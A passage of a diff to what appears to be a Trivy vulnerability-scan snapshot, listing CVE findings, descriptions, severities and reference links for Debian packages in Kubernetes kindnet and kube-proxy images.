'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-4209", + "installedVersion": "3.7.1-5", + "packageName": "libgnutls30", "references": [ - "https://access.redhat.com/security/cve/CVE-2023-29383", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", - "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", - "https://github.com/shadow-maint/shadow/pull/687", - "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", - "https://www.cve.org/CVERecord?id=CVE-2023-29383", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", - "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", + "https://access.redhat.com/security/cve/CVE-2021-4209", + "https://bugzilla.redhat.com/show_bug.cgi?id=2044156", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4209", + "https://gitlab.com/gnutls/gnutls/-/commit/3db352734472d851318944db13be73da61300568", + "https://gitlab.com/gnutls/gnutls/-/issues/1306", + "https://gitlab.com/gnutls/gnutls/-/merge_requests/1503", + "https://nvd.nist.gov/vuln/detail/CVE-2021-4209", + "https://security.netapp.com/advisory/ntap-20220915-0005/", + "https://ubuntu.com/security/notices/USN-5550-1", + "https://ubuntu.com/security/notices/USN-5750-1", + "https://www.cve.org/CVERecord?id=CVE-2021-4209", ], }, "category": "Vulnerability", - "description": "In Shadow 4.13, it is possible to inject control characters into fields provided to the SUID program chfn (change finger). Although it is not possible to exploit this directly (e.g., adding a new user fails because \\n is in the block list), it is possible to misrepresent the /etc/passwd file when viewed. Use of \\r manipulations and Unicode characters to work around blocking of the : character make it possible to give the impression that a new user has been added. In other words, an adversary may be able to convince a system administrator to take the system offline (an indirect, social-engineered denial of service) by demonstrating that "cat /etc/passwd" shows a rogue user account.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "A NULL pointer dereference flaw was found in GnuTLS. As Nettle's hash update functions internally call memcpy, providing zero-length input may cause undefined behavior. This flaw leads to a denial of service after authentication in rare circumstances.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "Improper input validation in shadow-utils package utility chfn", + "name": "GnuTLS: Null pointer dereference in MD_UPDATE", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-29383", + "value": "https://avd.aquasec.com/nvd/cve-2021-4209", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-29383", + "value": "https://access.redhat.com/security/cve/CVE-2021-4209", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2044156", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4209", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/687", + "value": "https://gitlab.com/gnutls/gnutls/-/commit/3db352734472d851318944db13be73da61300568", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", + "value": "https://gitlab.com/gnutls/gnutls/-/issues/1306", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-29383", + "value": "https://gitlab.com/gnutls/gnutls/-/merge_requests/1503", }, { "type": "URL", - "value": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-4209", }, { "type": "URL", - "value": "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", + "value": "https://security.netapp.com/advisory/ntap-20220915-0005/", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5550-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5750-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-4209", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2007-5686", - "installedVersion": "1:4.5-1.1", - "packageName": "passwd", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2011-3389", + "installedVersion": "3.7.1-5", + "packageName": "libgnutls30", "references": [ - "http://secunia.com/advisories/27215", - "http://www.securityfocus.com/archive/1/482129/100/100/threaded", - "http://www.securityfocus.com/archive/1/482857/100/0/threaded", - "http://www.securityfocus.com/bid/26048", - "http://www.vupen.com/english/advisories/2007/3474", - "https://issues.rpath.com/browse/RPL-1825", + "http://arcticdog.wordpress.com/2012/08/29/beast-openssl-and-apache/", + "http://blog.mozilla.com/security/2011/09/27/attack-against-tls-protected-communications/", + "http://blogs.technet.com/b/msrc/archive/2011/09/26/microsoft-releases-security-advisory-2588513.aspx", + "http://blogs.technet.com/b/srd/archive/2011/09/26/is-ssl-broken-more-about-security-advisory-2588513.aspx", + "http://curl.haxx.se/docs/adv_20120124B.html", + "http://downloads.asterisk.org/pub/security/AST-2016-001.html", + "http://ekoparty.org/2011/juliano-rizzo.php", + "http://eprint.iacr.org/2004/111", + "http://eprint.iacr.org/2006/136", + "http://googlechromereleases.blogspot.com/2011/10/chrome-stable-release.html", + "http://isc.sans.edu/diary/SSL+TLS+part+3+/11635", + "http://lists.apple.com/archives/Security-announce/2011//Oct/msg00001.html", + "http://lists.apple.com/archives/Security-announce/2011//Oct/msg00002.html", + "http://lists.apple.com/archives/security-announce/2012/Feb/msg00000.html", + "http://lists.apple.com/archives/security-announce/2012/Jul/msg00001.html", + "http://lists.apple.com/archives/security-announce/2012/May/msg00001.html", + "http://lists.apple.com/archives/security-announce/2012/Sep/msg00004.html", + "http://lists.apple.com/archives/security-announce/2013/Oct/msg00004.html", + "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00049.html", + "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00051.html", + "http://lists.opensuse.org/opensuse-security-announce/2012-05/msg00009.html", + "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00040.html", + "http://marc.info/?l=bugtraq&m=132750579901589&w=2", + "http://marc.info/?l=bugtraq&m=132872385320240&w=2", + "http://marc.info/?l=bugtraq&m=133365109612558&w=2", + "http://marc.info/?l=bugtraq&m=133728004526190&w=2", + "http://marc.info/?l=bugtraq&m=134254866602253&w=2", + "http://marc.info/?l=bugtraq&m=134254957702612&w=2", + "http://my.opera.com/securitygroup/blog/2011/09/28/the-beast-ssl-tls-issue", + "http://osvdb.org/74829", + "http://rhn.redhat.com/errata/RHSA-2012-0508.html", + "http://rhn.redhat.com/errata/RHSA-2013-1455.html", + "http://secunia.com/advisories/45791", + "http://secunia.com/advisories/47998", + "http://secunia.com/advisories/48256", + "http://secunia.com/advisories/48692", + "http://secunia.com/advisories/48915", + "http://secunia.com/advisories/48948", + "http://secunia.com/advisories/49198", + "http://secunia.com/advisories/55322", + "http://secunia.com/advisories/55350", + "http://secunia.com/advisories/55351", + "http://security.gentoo.org/glsa/glsa-201203-02.xml", + "http://security.gentoo.org/glsa/glsa-201406-32.xml", + "http://support.apple.com/kb/HT4999", + "http://support.apple.com/kb/HT5001", + "http://support.apple.com/kb/HT5130", + "http://support.apple.com/kb/HT5281", + "http://support.apple.com/kb/HT5501", + "http://support.apple.com/kb/HT6150", + "http://technet.microsoft.com/security/advisory/2588513", + "http://vnhacker.blogspot.com/2011/09/beast.html", + "http://www.apcmedia.com/salestools/SJHN-7RKGNM/SJHN-7RKGNM_R4_EN.pdf", + "http://www.debian.org/security/2012/dsa-2398", + "http://www.educatedguesswork.org/2011/09/security_impact_of_the_rizzodu.html", + "http://www.ibm.com/developerworks/java/jdk/alerts/", + "http://www.imperialviolet.org/2011/09/23/chromeandbeast.html", + "http://www.insecure.cl/Beast-SSL.rar", + "http://www.kb.cert.org/vuls/id/864643", + "http://www.mandriva.com/security/advisories?name=MDVSA-2012:058", + "http://www.opera.com/docs/changelogs/mac/1151/", + "http://www.opera.com/docs/changelogs/mac/1160/", + "http://www.opera.com/docs/changelogs/unix/1151/", + "http://www.opera.com/docs/changelogs/unix/1160/", + "http://www.opera.com/docs/changelogs/windows/1151/", + "http://www.opera.com/docs/changelogs/windows/1160/", + "http://www.opera.com/support/kb/view/1004/", + "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html", + "http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html", + "http://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html", + "http://www.redhat.com/support/errata/RHSA-2011-1384.html", + "http://www.redhat.com/support/errata/RHSA-2012-0006.html", + "http://www.securityfocus.com/bid/49388", + "http://www.securityfocus.com/bid/49778", + "http://www.securitytracker.com/id/1029190", + "http://www.securitytracker.com/id?1025997", + "http://www.securitytracker.com/id?1026103", + "http://www.securitytracker.com/id?1026704", + "http://www.ubuntu.com/usn/USN-1263-1", + "http://www.us-cert.gov/cas/techalerts/TA12-010A.html", + "https://access.redhat.com/security/cve/CVE-2011-3389", + "https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_fetchmail", + "https://bugzilla.novell.com/show_bug.cgi?id=719047", + "https://bugzilla.redhat.com/show_bug.cgi?id=737506", + "https://cert-portal.siemens.com/productcert/pdf/ssa-556833.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3389", + "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-006", + "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03839862", + "https://hermes.opensuse.org/messages/13154861", + "https://hermes.opensuse.org/messages/13155432", + "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", + "https://linux.oracle.com/cve/CVE-2011-3389.html", + "https://linux.oracle.com/errata/ELSA-2011-1380.html", + "https://nvd.nist.gov/vuln/detail/CVE-2011-3389", + "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14752", + "https://ubuntu.com/security/notices/USN-1263-1", + "https://www.cve.org/CVERecord?id=CVE-2011-3389", ], }, "category": "Vulnerability", - "description": "initscripts in rPath Linux 1 sets insecure permissions for the /var/log/btmp file, which allows local users to obtain sensitive information regarding authentication attempts. NOTE: because sshd detects the insecure permissions and does not log certain events, this also prevents sshd from logging failed authentication attempts by remote attackers.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a "BEAST" attack.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "initscripts in rPath Linux 1 sets insecure permissions for the /var/lo ...", + "name": "HTTPS: block-wise chosen-plaintext attack against SSL/TLS (BEAST)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2007-5686", + "value": "https://avd.aquasec.com/nvd/cve-2011-3389", }, { "type": "URL", - "value": "http://secunia.com/advisories/27215", + "value": "http://arcticdog.wordpress.com/2012/08/29/beast-openssl-and-apache/", }, { "type": "URL", - "value": "http://www.securityfocus.com/archive/1/482129/100/100/threaded", + "value": "http://blog.mozilla.com/security/2011/09/27/attack-against-tls-protected-communications/", }, { "type": "URL", - "value": "http://www.securityfocus.com/archive/1/482857/100/0/threaded", + "value": "http://blogs.technet.com/b/msrc/archive/2011/09/26/microsoft-releases-security-advisory-2588513.aspx", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/26048", + "value": "http://blogs.technet.com/b/srd/archive/2011/09/26/is-ssl-broken-more-about-security-advisory-2588513.aspx", }, { "type": "URL", - "value": "http://www.vupen.com/english/advisories/2007/3474", + "value": "http://curl.haxx.se/docs/adv_20120124B.html", }, { "type": "URL", - "value": "https://issues.rpath.com/browse/RPL-1825", + "value": "http://downloads.asterisk.org/pub/security/AST-2016-001.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2013-4235", - "installedVersion": "1:4.5-1.1", - "packageName": "passwd", - "references": [ - "https://access.redhat.com/security/cve/CVE-2013-4235", - "https://access.redhat.com/security/cve/cve-2013-4235", - "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", - "https://github.com/shadow-maint/shadow/issues/317", - "https://github.com/shadow-maint/shadow/pull/545", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", - "https://security-tracker.debian.org/tracker/CVE-2013-4235", - "https://security.gentoo.org/glsa/202210-26", - "https://ubuntu.com/security/notices/USN-5745-1", - "https://ubuntu.com/security/notices/USN-5745-2", - "https://www.cve.org/CVERecord?id=CVE-2013-4235", - ], - }, - "category": "Vulnerability", - "description": "shadow: TOCTOU (time-of-check time-of-use) race condition when copying and removing directory trees", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "shadow-utils: TOCTOU race conditions by copying and removing directory trees", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2013-4235", + "value": "http://ekoparty.org/2011/juliano-rizzo.php", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2013-4235", + "value": "http://eprint.iacr.org/2004/111", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/cve-2013-4235", + "value": "http://eprint.iacr.org/2006/136", }, { "type": "URL", - "value": "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", + "value": "http://googlechromereleases.blogspot.com/2011/10/chrome-stable-release.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", + "value": "http://isc.sans.edu/diary/SSL+TLS+part+3+/11635", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", + "value": "http://lists.apple.com/archives/Security-announce/2011//Oct/msg00001.html", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/issues/317", + "value": "http://lists.apple.com/archives/Security-announce/2011//Oct/msg00002.html", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/545", + "value": "http://lists.apple.com/archives/security-announce/2012/Feb/msg00000.html", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", + "value": "http://lists.apple.com/archives/security-announce/2012/Jul/msg00001.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", + "value": "http://lists.apple.com/archives/security-announce/2012/May/msg00001.html", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2013-4235", + "value": "http://lists.apple.com/archives/security-announce/2012/Sep/msg00004.html", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-26", + "value": "http://lists.apple.com/archives/security-announce/2013/Oct/msg00004.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5745-1", + "value": "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00049.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5745-2", + "value": "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00051.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2013-4235", + "value": "http://lists.opensuse.org/opensuse-security-announce/2012-05/msg00009.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-7169", - "installedVersion": "1:4.5-1.1", - "packageName": "passwd", - "references": [ - "https://access.redhat.com/security/cve/CVE-2018-7169", - "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7169", - "https://github.com/shadow-maint/shadow/pull/97", - "https://nvd.nist.gov/vuln/detail/CVE-2018-7169", - "https://security.gentoo.org/glsa/201805-09", - "https://ubuntu.com/security/notices/USN-5254-1", - "https://www.cve.org/CVERecord?id=CVE-2018-7169", - ], - }, - "category": "Vulnerability", - "description": "An issue was discovered in shadow 4.5. newgidmap (in shadow-utils) is setuid and allows an unprivileged user to be placed in a user namespace where setgroups(2) is permitted. This allows an attacker to remove themselves from a supplementary group, which may allow access to certain filesystem paths if the administrator has used "group blacklisting" (e.g., chmod g-rwx) to restrict access to paths. This flaw effectively reverts a security feature in the kernel (in particular, the /proc/self/setgroups knob) to prevent this sort of privilege escalation.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "shadow-utils: newgidmap allows unprivileged user to drop supplementary groups potentially allowing privilege escalation", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-7169", + "value": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00040.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-7169", + "value": "http://marc.info/?l=bugtraq&m=132750579901589&w=2", }, { "type": "URL", - "value": "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357", + "value": "http://marc.info/?l=bugtraq&m=132872385320240&w=2", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7169", + "value": "http://marc.info/?l=bugtraq&m=133365109612558&w=2", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/97", + "value": "http://marc.info/?l=bugtraq&m=133728004526190&w=2", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-7169", + "value": "http://marc.info/?l=bugtraq&m=134254866602253&w=2", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/201805-09", + "value": "http://marc.info/?l=bugtraq&m=134254957702612&w=2", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5254-1", + "value": "http://my.opera.com/securitygroup/blog/2011/09/28/the-beast-ssl-tls-issue", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-7169", + "value": "http://osvdb.org/74829", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-19882", - "installedVersion": "1:4.5-1.1", - "packageName": "passwd", - "references": [ - "https://access.redhat.com/security/cve/CVE-2019-19882", - "https://bugs.archlinux.org/task/64836", - "https://bugs.gentoo.org/702252", - "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", - "https://github.com/shadow-maint/shadow/pull/199", - "https://github.com/void-linux/void-packages/pull/17580", - "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", - "https://security.gentoo.org/glsa/202008-09", - "https://www.cve.org/CVERecord?id=CVE-2019-19882", - ], - }, - "category": "Vulnerability", - "description": "shadow 4.8, in certain circumstances affecting at least Gentoo, Arch Linux, and Void Linux, allows local users to obtain root access because setuid programs are misconfigured. Specifically, this affects shadow 4.8 when compiled using --with-libpam but without explicitly passing --disable-account-tools-setuid, and without a PAM configuration suitable for use with setuid account management tools. This combination leads to account management tools (groupadd, groupdel, groupmod, useradd, userdel, usermod) that can easily be used by unprivileged local users to escalate privileges to root in multiple ways. This issue became much more relevant in approximately December 2019 when an unrelated bug was fixed (i.e., the chmod calls to suidusbins were fixed in the upstream Makefile which is now included in the release version 4.8).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "shadow-utils: local users can obtain root access because setuid programs are misconfigured", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-19882", + "value": "http://rhn.redhat.com/errata/RHSA-2012-0508.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-19882", + "value": "http://rhn.redhat.com/errata/RHSA-2013-1455.html", }, { "type": "URL", - "value": "https://bugs.archlinux.org/task/64836", + "value": "http://secunia.com/advisories/45791", }, { "type": "URL", - "value": "https://bugs.gentoo.org/702252", + "value": "http://secunia.com/advisories/47998", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", + "value": "http://secunia.com/advisories/48256", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/199", + "value": "http://secunia.com/advisories/48692", }, { "type": "URL", - "value": "https://github.com/void-linux/void-packages/pull/17580", + "value": "http://secunia.com/advisories/48915", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", + "value": "http://secunia.com/advisories/48948", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202008-09", + "value": "http://secunia.com/advisories/49198", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-19882", + "value": "http://secunia.com/advisories/55322", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-29383", - "installedVersion": "1:4.5-1.1", - "packageName": "passwd", - "references": [ - "https://access.redhat.com/security/cve/CVE-2023-29383", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", - "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", - "https://github.com/shadow-maint/shadow/pull/687", - "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", - "https://www.cve.org/CVERecord?id=CVE-2023-29383", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", - "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", - ], - }, - "category": "Vulnerability", - "description": "In Shadow 4.13, it is possible to inject control characters into fields provided to the SUID program chfn (change finger). Although it is not possible to exploit this directly (e.g., adding a new user fails because \\n is in the block list), it is possible to misrepresent the /etc/passwd file when viewed. Use of \\r manipulations and Unicode characters to work around blocking of the : character make it possible to give the impression that a new user has been added. In other words, an adversary may be able to convince a system administrator to take the system offline (an indirect, social-engineered denial of service) by demonstrating that "cat /etc/passwd" shows a rogue user account.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "Improper input validation in shadow-utils package utility chfn", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-29383", + "value": "http://secunia.com/advisories/55350", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-29383", + "value": "http://secunia.com/advisories/55351", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", + "value": "http://security.gentoo.org/glsa/glsa-201203-02.xml", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", + "value": "http://security.gentoo.org/glsa/glsa-201406-32.xml", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/687", + "value": "http://support.apple.com/kb/HT4999", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", + "value": "http://support.apple.com/kb/HT5001", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-29383", + "value": "http://support.apple.com/kb/HT5130", }, { "type": "URL", - "value": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", + "value": "http://support.apple.com/kb/HT5281", }, { "type": "URL", - "value": "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", + "value": "http://support.apple.com/kb/HT5501", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-16156", - "installedVersion": "5.28.1-6+deb10u1", - "packageName": "perl-base", - "references": [ - "http://blogs.perl.org/users/neilb/2021/11/addressing-cpan-vulnerabilities-related-to-checksums.html", - "https://access.redhat.com/security/cve/CVE-2020-16156", - "https://blog.hackeriet.no/cpan-signature-verification-vulnerabilities/", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16156", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SD6RYOJII7HRJ6WVORFNVTYNOFY5JDXN/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SZ32AJIV4RHJMLWLU5QULGKMMIHYOMDC/", - "https://metacpan.org/pod/distribution/CPAN/scripts/cpan", - "https://nvd.nist.gov/vuln/detail/CVE-2020-16156", - "https://ubuntu.com/security/notices/USN-5689-1", - "https://ubuntu.com/security/notices/USN-5689-2", - "https://www.cve.org/CVERecord?id=CVE-2020-16156", - ], - }, - "category": "Vulnerability", - "description": "CPAN 2.28 allows Signature Verification Bypass.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "perl-CPAN: Bypass of verification of signatures in CHECKSUMS files", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-16156", + "value": "http://support.apple.com/kb/HT6150", }, { "type": "URL", - "value": "http://blogs.perl.org/users/neilb/2021/11/addressing-cpan-vulnerabilities-related-to-checksums.html", + "value": "http://technet.microsoft.com/security/advisory/2588513", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-16156", + "value": "http://vnhacker.blogspot.com/2011/09/beast.html", }, { "type": "URL", - "value": "https://blog.hackeriet.no/cpan-signature-verification-vulnerabilities/", + "value": "http://www.apcmedia.com/salestools/SJHN-7RKGNM/SJHN-7RKGNM_R4_EN.pdf", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16156", + "value": "http://www.debian.org/security/2012/dsa-2398", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SD6RYOJII7HRJ6WVORFNVTYNOFY5JDXN/", + "value": "http://www.educatedguesswork.org/2011/09/security_impact_of_the_rizzodu.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SZ32AJIV4RHJMLWLU5QULGKMMIHYOMDC/", + "value": "http://www.ibm.com/developerworks/java/jdk/alerts/", }, { "type": "URL", - "value": "https://metacpan.org/pod/distribution/CPAN/scripts/cpan", + "value": "http://www.imperialviolet.org/2011/09/23/chromeandbeast.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-16156", + "value": "http://www.insecure.cl/Beast-SSL.rar", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5689-1", + "value": "http://www.kb.cert.org/vuls/id/864643", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5689-2", + "value": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:058", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-16156", + "value": "http://www.opera.com/docs/changelogs/mac/1151/", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-31484", - "installedVersion": "5.28.1-6+deb10u1", - "packageName": "perl-base", - "references": [ - "http://www.openwall.com/lists/oss-security/2023/04/29/1", - "http://www.openwall.com/lists/oss-security/2023/05/03/3", - "http://www.openwall.com/lists/oss-security/2023/05/03/5", - "http://www.openwall.com/lists/oss-security/2023/05/07/2", - "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-31484", - "https://github.com/andk/cpanpm/commit/9c98370287f4e709924aee7c58ef21c85289a7f0 (2.35-TRIAL)", - "https://github.com/andk/cpanpm/pull/175", - "https://metacpan.org/dist/CPAN/changes", - "https://ubuntu.com/security/notices/USN-6112-1", - "https://ubuntu.com/security/notices/USN-6112-2", - "https://www.openwall.com/lists/oss-security/2023/04/18/14", - ], - }, - "category": "Vulnerability", - "description": "CPAN.pm before 2.35 does not verify TLS certificates when downloading distributions over HTTPS.", - 